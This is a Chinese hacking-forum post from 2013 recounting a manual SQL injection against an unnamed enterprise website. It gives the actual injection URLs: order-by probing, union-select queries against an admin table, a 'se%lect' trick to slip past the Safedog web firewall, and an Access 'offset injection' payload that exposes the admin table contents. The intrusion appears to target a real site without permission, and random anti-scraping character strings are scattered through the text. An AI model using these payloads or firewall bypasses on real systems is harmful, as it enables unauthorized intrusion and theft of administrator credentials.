找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2058|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
打开网站,一个企业站。
" P' s6 n# k2 O, f, K
# J4 d3 j9 Y' H) z% H5 u) e  S, U2 C9 \' ]7 P( `
顺手加个admin& E, r  |  d- E$ W% F
$ X0 L) A  n" q

! a( g) y" A% B, @4 q0 t默认后台。2 ?: O  @) u; ^; r9 q' v
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​; V; c& i2 |, |: s# ?. c
5 U4 [2 C/ t+ z% L. U
( [" U0 |, ?7 r5 y; W

+ W  {  m# h  R3 V$ {$ m- y0 n8 q所以就不用御剑扫了,待会直接封IP。' v& U5 ]( j6 e/ C4 ?/ Z0 N

# ]% `8 C5 T% V. t) d) |用order by语句判断是否存在注入。
* C4 b! H& `8 }; R$ Jhttp://www.xxx.com /product_show.asp?id=997 order by 1
. E% X, A( C: g, {8 m! Yhttp://www.xxx.com /product_show.asp?id=997 order by 100* E" k& V( p# d( v/ Z7 n/ G+ c
现在存在注入,经测试后发现是9个字段。2 q1 j  A8 @: Q

% M# \1 o! v8 V接下来进行联合查询,猜是否存在admin表。
/ n; n7 f' I, i: L) ~( nhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​1 A; f: [# ]. M! n* I
& [# M) i: o8 R: Q1 b: u" P

5 g% n- ?, h0 P$ c* ^' P  j& D- X) P
在select中间加个%,se%lect绕过安全狗。
- U* K6 N6 h3 U3 _3 x+ a
/ w6 R' y7 `0 n
5 L2 x! h: v/ Y发现存在admin表,然后开始手工猜常用的字段。& T! t# n- ~. w% S, _4 d+ o# ~
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
8 U$ R; k% S) j/ ?! X. v; ]7 Z* _; p
+ E9 M# l  X8 _& f; e突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。3 ^; R( c6 O( y0 D: z  }, [

# L% \& Y& s% J* L! y/ a! ~7 @7 f科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。6 G$ \% A# A% h
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
9 k" Z+ ], s- m7 b: B1 g; V好了,敏感内容出显了。​0 [# F' f5 U( L$ z1 r9 |

9 N8 x5 j. j: H; ^2 I7 [4 v+ e$ Z5 u8 }- g3 L" A
' T& d3 N% R% d) x3 b6 N4 V2 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表